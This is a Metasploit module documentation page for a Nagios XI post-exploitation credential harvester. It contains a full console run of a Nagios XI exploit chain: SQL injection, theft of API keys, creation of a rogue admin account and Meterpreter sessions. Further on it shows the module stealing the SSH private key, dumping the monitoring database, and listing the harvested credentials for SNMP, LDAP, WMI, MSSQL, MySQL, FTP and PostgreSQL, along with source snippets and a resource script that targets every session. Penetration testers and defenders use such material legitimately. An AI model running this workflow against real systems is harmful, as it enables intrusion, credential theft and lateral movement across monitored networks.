Nagios XI Enumeration - Metasploit

This page contains detailed information about how to use the post/linux/gather/enum_nagios_xi metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview

Name: Nagios XI Enumeration
Module: post/linux/gather/enum_nagios_xi
Source code: modules/post/linux/gather/enum_nagios_xi.rb
Disclosure date: 2018-04-17
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: -

NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials, creating opportunities for lateral movement.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/linux/gather/enum_nagios_xi

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/linux/gather/enum_nagios_xi
msf post(enum_nagios_xi) > show options
    ... show and set options ...
msf post(enum_nagios_xi) > set SESSION session-id
msf post(enum_nagios_xi) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:

framework.sessions.each_pair do |sid, session|
  run_single("use post/linux/gather/enum_nagios_xi")
  run_single("set SESSION #{sid}")

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Knowledge Base


NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials, creating opportunities for lateral movement.

Verification Steps

  1. Start msfconsole
  2. Get a session via exploits/linux/http/nagios_xi.rb
  3. Do: post/linux/gather/enum_nagios_xi.rb
  4. Do: set session <session>
  5. Do: run
  6. Do: creds
  7. Do: cat <nagiosxi_raw_db_dump>



Which session to use, which can be viewed with sessions -l


Run NagiosXI exploit

msf > use exploit/linux/http/nagios_xi
msf exploit(linux/http/nagios_xi) > set lhost 
lhost =>
msf exploit(linux/http/nagios_xi) > set rhost
rhost =>
msf exploit(linux/http/nagios_xi) > 
msf exploit(linux/http/nagios_xi) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 
msf exploit(linux/http/nagios_xi) > [*] STEP 0: Get Nagios XI version string.
[+] STEP 0: Found Nagios XI version: 5.4.12
[*] STEP 1: Setting Nagios XI DB user to root.
[*] STEP 1: Received a 302 Response. That's good!
[*] STEP 2: Exploiting SQLi to extract user API keys.
[*] STEP 2: Received a 302 Response. That's good!
[*] Found 11 unique api keys
[*] tuiWeCnN64nXtkJcQE2u4u9durfmqjqdQM94EP8JSuWG8W8YAqMTXU6rFF75eBil
[*] qt7AJRfXYknvoq0jqBD44SJQmpPvDSb3miD5p83nMJdqqd3T4Fd7uVdTEiJebTAA
[*] I5W4tvAbrc0biW802ZTTqeA3rOYhHIrlMnIfceJHqZR2dfiuecnHJXZaLeLoWc3Y
[*] MtuaHUupZ9dpto5ddTCMigGVQR0nTv7F2E5YOCn4LTtuhBKOLDA3ScfYjvldkr8l
[*] BkEJZtQfNApvRIvbg77sLGjvTrQBmBcXb6WqC3YmCnbJl0UF7hnReJmnqsXQj94N
[*] 2nTEUjDQ9iY3NrVaUu2NYB6TZ0WWtcquCjpNF2D4kRnnCCBt6SAkpGdJWqFJF5eu
[*] O4WSLrSpu7iK4iEVfgnDhPB2bdkONs4BPgKA0CfOZBv3SpX7ZF0AKRRb4bYRH2IM
[*] 5KWtYXRbnEmfnm4Qfiapj4lG6M3X948u4l0jC8tZ2aepvBv4SYsc288oabliuNPC
[*] Ord0hrk9Ter9gbirugtvrotkWoJVIlcN6J4maoP3FgrcL4Gvj945QBoNfnYdMqZR
[*] STEP 3: Using API Keys to add an administrative user...
[*] STEP 3: trying to add admin user with key tuiWeCnN64nXtkJcQE2u4u9durfmqjqdQM94EP8JSuWG8W8YAqMTXU6rFF75eBil
[+] Added user:yScojGUCgAPilfqh password:fqQCBzaGXpZHFvoJ userid:30
[*] STEP 4.1: Authenticate as user yScojGUCgAPilfqh with password fqQCBzaGXpZHFvoJ
[*] STEP 4.1: Get NSP and nagiosxi for login..
[*] STEP 4.1: login_nsp 8f370fa23e68e6704abdfd49b7d114cf610704f8466d1164c45718b8008d6871 
[*] STEP 4.1: login_nagiosxi vfa3qfp8kihitivaepnrn4n350
[*] STEP 4.2: Authenticating...
[*] STEP 4.2: authed_nagiosxi mk0j50na6009ab0sa1t8e9t166
[*] STEP 5.1: executing payload
[*] STEP 5.2: removing scripts from disc
[*] Command Stager progress - 100.00% done (701/701 bytes)
[*] STEP 6.1: Setting Nagios XI DB user to nagiosql.
[*] STEP 6.1: Received a 302 Response. That's good!
[*] STEP 6.2: deleting admin
[*] Sending stage (857352 bytes) to
[*] Meterpreter session 4 opened ( -> at 2018-04-26 18:31:51 -0400
[*] Sending stage (857352 bytes) to
[*] Meterpreter session 5 opened ( -> at 2018-04-26 18:31:51 -0400

msf exploit(linux/http/nagios_xi) > 

Run linux/gather/enum_nagios_xi
msf exploit(linux/http/nagios_xi) > use post/linux/gather/enum_nagios_xi msf post(linux/gather/enum_nagios_xi) > set session 4 session => 4 msf post(linux/gather/enum_nagios_xi) > run

[] Attempting to grab Nagios SSH key [] - Downloading /home/nagios/.ssh/id_rsa [+] SSH key found! [] Nagios SSH key stored in /root/.msf4/loot/20180426183506_default_10.20.1.173_nagios_ssh_priv__025011.txt [] Attempting to dump Nagios DB [] - Downloading /tmp/yYdBpcDv [+] Nagios DB dump successful [] Raw Nagios DB dump /root/.msf4/loot/20180426183521_default_10.20.1.173_nagiosxi_raw_db__491781.txt [] Look through the DB dump manually. There could be some good loot we didn't parse out. [] Run 'creds' to see credentials loaded into the MSF DB [*] Post module execution completed

View parsed out credentials stored in the MSF DB
msf post(linux/gather/enum_nagios_xi) > creds Credentials ===========

host origin service public private realm private_type 161/udp (SNMP) verypublic Blank password 389/tcp (LDAP) cn=bort,cn=users,dc=fruitsnacks,dc=co ##123BLAHBLAH~~ Password 135/tcp (WMI) homer LISA-NEEDS-BRACES Password 22/tcp (SSH) nagios 76:95:a6:af:e9:c8:1b:6b:3e:ea:3d:f4:b0:cc:84:fc SSH key 3306/tcp (MySQL) root nagiosxi Password 22/tcp (SSH) nagios 76:95:a6:af:e9:c8:1b:6b:3e:ea:3d:f4:b0:cc:84:fc SSH key 1433/tcp (MSSQL) app_user t8Y4RNqKknRyX4A8x5Gm Password 21/tcp (FTP) ftp_user agoodpassword Password 135/tcp (WMI) homer GETDUFF3D fruitsnacks Password 21/tcp (FTP) bort 1BARTSIMPSONS Password 135/tcp (WMI) user agoodpassowrd Password 5432/tcp (PostgreSQL) root y8EZqAVDS8VH96gaqEk5 Password

msf post(linux/gather/enum_nagios_xi) >

Check the raw DB dump store in loot for creds we might have missed
root@kali:~# cat /root/.msf4/loot/20180426183521_default_10.20.1.173_nagiosxi_raw_db_491781.txt "1","","" "25","","bort!1BARTSIMPSONS!21" "25","","ftp_user!agoodpassword!21" "27","","" "30","","20%!10%!/" "31","","5.0,4.0,3.0!10.0,6.0,4.0" "33","","400!500!RSZDT" "34","","20!10" "35","","20!50" "47","","100.0,20%!500.0,60%" "54","","" "59","","-C %22/usr/local/nagios/libexec/check_users -w 5 -c 10%22" "59","","-C %22/usr/local/nagios/libexec/check_disk /%22" "59","","-C %22/usr/local/nagios/libexec/check_procs -w 150 -c 170%22" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --lockwait --warning 2000 --critical 3000" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --lockwaits --warning 20 --critical 30" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --pagelooks --warning 10 --critical 20" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --pagereads --warning 20 --critical 30" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --pagesplits --warning 20 --critical 30" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --pagewrites --warning 20 --critical 30" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --readahead --warning 40 --critical 50" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --stolenpages --warning 500 --critical 700" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --targetpages --warning 70000 --critical 90000" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --locktimeouts --warning 20 --critical 30" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --lockrequests --warning 20 --critical 30" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --lazywrites --warning 20 --critical 30" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --freepages --warning 10 --critical 20" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --deadlocks --warning 20 --critical 30" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --checkpoints --warning 20 --critical 30" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --time2connect --warning 1 --critical 5" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --databasepages --warning 300 --critical 600" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --averagewait --warning 20 --critical 30" "66","","-U 'app_user' -P 't8Y4RNqKknRyX4A8x5Gm' -p 1433 --bufferhitratio --warning 90: --critical 95:" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode uptime --warning 10: --critical 5:" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode tablecache-hitrate --warning 99: --critical 95:" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode threadcache-hitrate --warning 90: --critical 80:" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode slow-queries --warning 0.1 --critical 1" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode threads-connected --warning 10 --critical 20" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode qcache-hitrate --warning 90: --critical 80:" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode keycache-hitrate --warning 99: --critical 95:" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode log-waits --warning 1 --critical 10" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode long-running-procs --warning 10 --critical 20" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode connection-time --warning 1 --critical 5" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode index-usage --warning 90: --critical 80:" "67","","--hostname= --port=3306 --username=root --password=%22nagiosxi%22 --database=information_schema --mode bufferpool-hitrate --warning 99: --critical 95:" "70","","-t 'asdfasdf' -P 5693 -M 'processes' -q 'name=calc' -w 60 -c 100" "70","","-t 'asdfasdf' -P 5693 -M memory/swap -u Gi -w 50 -c 80" "70","","-t 'asdfasdf' -P 5693 -M 'interface/Local Area Connection/bytes_recv' -d -u M -w 10 -c 100" "70","","-t 'asdfasdf' -P 5693 -M 'interface/Local Area Connection/bytes_sent' -d -u M -w 10 -c 100" "70","","-t 'asdfasdf' -P 5693 -M 'disk/logical/C:|/used_percent' -w 70 -c 90" "76","","-H --port=5432 --dbuser=root --dbname=postgres --dbpass=%22y8EZqAVDS8VH96gaqEk5%22 --action=relation_size --warning=50MB --critical=100MB" "76","","-H --port=5432 --dbuser=root --dbname=postgres --dbpass=%22y8EZqAVDS8VH96gaqEk5%22 --action=connection" "76","","-H --port=5432 --dbuser=root --dbname=postgres --dbpass=%22y8EZqAVDS8VH96gaqEk5%22 --action=sequence --warning=30% --critical=10%" "76","","-H --port=5432 --dbuser=root --dbname=postgres --dbpass=%22y8EZqAVDS8VH96gaqEk5%22 --action=database_size --warning=500MB --critical=1GB" "80",""," -p 21" "80",""," -p 21" "85","","verypublic!9!-v 2 -p 161" "85","","verypublic!99!-v 2 -p 161" "85","","verypublic!8!-v 2 -p 161" "85","","verypublic!7!-v 2 -p 161" "85","","verypublic!6!-v 2 -p 161" "85","","verypublic!5!-v 2 -p 161" "85","","verypublic!51!-v 2 -p 161" "85","","verypublic!4!-v 2 -p 161" "85","","verypublic!3!-v 2 -p 161" "85","","verypublic!24!-v 2 -p 161" "85","","verypublic!23!-v 2 -p 161" "85","","verypublic!22!-v 2 -p 161" "85","","verypublic!20!-v 2 -p 161" "85","","verypublic!21!-v 2 -p 161" "85","","verypublic!19!-v 2 -p 161" "85","","verypublic!2!-v 2 -p 161" "85","","verypublic!16!-v 2 -p 161" "85","","verypublic!17!-v 2 -p 161" "85","","verypublic!18!-v 2 -p 161" "85","","verypublic!15!-v 2 -p 161" "85","","verypublic!148!-v 2 -p 161" "85","","verypublic!14!-v 2 -p 161" "85","","verypublic!13!-v 2 -p 161" "85","","verypublic!128!-v 2 -p 161" "85","","verypublic!1!-v 2 -p 161" "88","","-b %22dc=fruitsnacks,dc=co%22 -D %22cn=bort,cn=users,dc=fruitsnacks,dc=co%22 -P %22##123BLAHBLAH~~%22 -2" "92","","asdfasdf!MEMUSE!-w 80 -c 90" "92","","asdfasdf!UPTIME" "92","","asdfasdf!CPULOAD!-l 5,80,90" "92","","asdfasdf!USEDDISKSPACE!-l C -w 80 -c 95" "92","","asdfasdf!PROCSTATE!-l explorer.exe -d SHOWALL" "93","","3000.0!80%!5000.0!100%" "93","","3000.0!80%!5000.0!100%" "93","","3000.0!80%!5000.0!100%" "93","","3000.0!80%!5000.0!100%" "93","","3000.0!80%!5000.0!100%" "93","","3000.0!80%!5000.0!100%" "96",""," -o sysUpTime.0 -C verypublic -P 2c" "96",""," -o ifOperStatus.1 -C verypublic -P 2c -m RFC1213-MIB -r %221%22" "96",""," -o . -C verypublic -P 2c -l %22Ambient Temp%22 -u %22Deg. Celsius%22 -w 29 -c 35" "106","","npcd!!!!!!" "106","","ntpd!!!!!!" "106","","mysqld!!!!!!" "106","","ndo2db!!!!!!" "106","","crond!!!!!!" "106","","httpd!!!!!!" "110","","'user'!'agoodpassword'!checkpage!-w '80' -c '90'" "110","","'user'!'agoodpassword'!checkmem!-s physical -w '80' -c '90'" "110","","'user'!'agoodpassword'!checkdrivesize!-a 'C': -w '80' -c '95'" "110","","'user'!'agoodpassword'!checkcpu!-w '80' -c '90'" "110","","'fruitsnacks/homer'!'_GETDUFF3D'!checkcpu!-w '80' -c '90'" "110","","'fruitsnacks/homer'!'GETDUFF3D'!checkdrivesize!-a 'C': -w '80' -c '95'" "110","","'fruitsnacks/homer'!'GETDUFF3D'!checkmem!-s physical -w '80' -c '90'" "110","","'fruitsnacks/homer'!'GETDUFF3D'!checkpage!-w '80' -c '90'" "110","","'homer'!'LISA-NEEDS-BRACES'!checkprocess!-s Commandline -a 'cmd.exe' -c _ItemCount=1:" "110","","'homer'!'LISA-NEEDS-BRACES'!checkpage!-w '80' -c '90'" "110","","'homer'!'LISA-NEEDS-BRACES'!checkdrivesize!-a 'C': -w '80' -c '95'" "110","","'homer'!'LISA-NEEDS-BRACES'!checkmem!-s physical -w '80' -c '90'" "110","","'homer'!'LISA-NEEDS-BRACES'!checkservice!-a 'ADWS' -c _Total=1: -c 0" "110","","'homer'!'LISA-NEEDS-BRACES'!checkservice!-a 'AeLookupSvc' -c _Total=1: -c 0"

Go back to menu.

Msfconsole Usage

Here is how the linux/gather/enum_nagios_xi post exploitation module looks in the msfconsole:

msf6 > use post/linux/gather/enum_nagios_xi

msf6 post(linux/gather/enum_nagios_xi) > show info

       Name: Nagios XI Enumeration
     Module: post/linux/gather/enum_nagios_xi
   Platform: Linux
       Rank: Normal
  Disclosed: 2018-04-17

Provided by:
  Cale Smith

Compatible session types:

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DB_ROOT_PWD  nagiosxi         yes       Password for DB root user, an option if they change this
  SESSION                       yes       The session to run this module on.

  NagiosXI may store credentials of the hosts it monitors. This module 
  extracts these credentials, creating opportunities for lateral 

Module Options

This is a complete list of options available in the linux/gather/enum_nagios_xi post exploitation module:

msf6 post(linux/gather/enum_nagios_xi) > show options

Module options (post/linux/gather/enum_nagios_xi):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DB_ROOT_PWD  nagiosxi         yes       Password for DB root user, an option if they change this
   SESSION                       yes       The session to run this module on.

Advanced Options

Here is a complete list of advanced options supported by the linux/gather/enum_nagios_xi post exploitation module:

msf6 post(linux/gather/enum_nagios_xi) > show advanced

Module advanced options (post/linux/gather/enum_nagios_xi):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   FileDropperDelay                   no        Delay in seconds before attempting cleanup
   VERBOSE           false            no        Enable detailed status messages
   WORKSPACE                          no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the linux/gather/enum_nagios_xi module can do:

msf6 post(linux/gather/enum_nagios_xi) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the linux/gather/enum_nagios_xi post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(linux/gather/enum_nagios_xi) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No SSH key found

Here is a relevant code snippet related to the "No SSH key found" error message:

89:	          ssh_key,
90:	          nil
91:	        )
92:	        print_status("Nagios SSH key stored in #{ssh_key_loot}")
93:	      else
94:	        print_status('No SSH key found')
95:	      end
97:	      print_status('Attempting to dump Nagios DB')
98:	      db_dump_file  = "/tmp/#{Rex::Text.rand_text_alpha(6)}"

Could not get DB contents: <VALUE>

Here is a relevant code snippet related to the "Could not get DB contents: <VALUE>" error message:

105:	      sql_query <<  %Q|ORDER BY nagios_services.check_command_object_id |
106:	      sql_query <<  %Q|INTO OUTFILE '#{db_dump_file}' FIELDS TERMINATED BY ',' ENCLOSED BY '\\"' LINES TERMINATED BY '\\n' ;"|
108:	      out = cmd_exec(sql_query)
109:	      if out.match(/error/i)
110:	        print_error("Could not get DB contents: #{out.gsub(/\n/, ' ')}")
111:	        return
112:	      else
113:	        db_dump = read_file(db_dump_file)
114:	        print_good('Nagios DB dump successful')
115:	        # store raw db results, there is likely good stuff in here that we don't parse out

Go back to menu.

Go back to menu.

See Also

Check also the following modules related to this module:


  • Cale Smith


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

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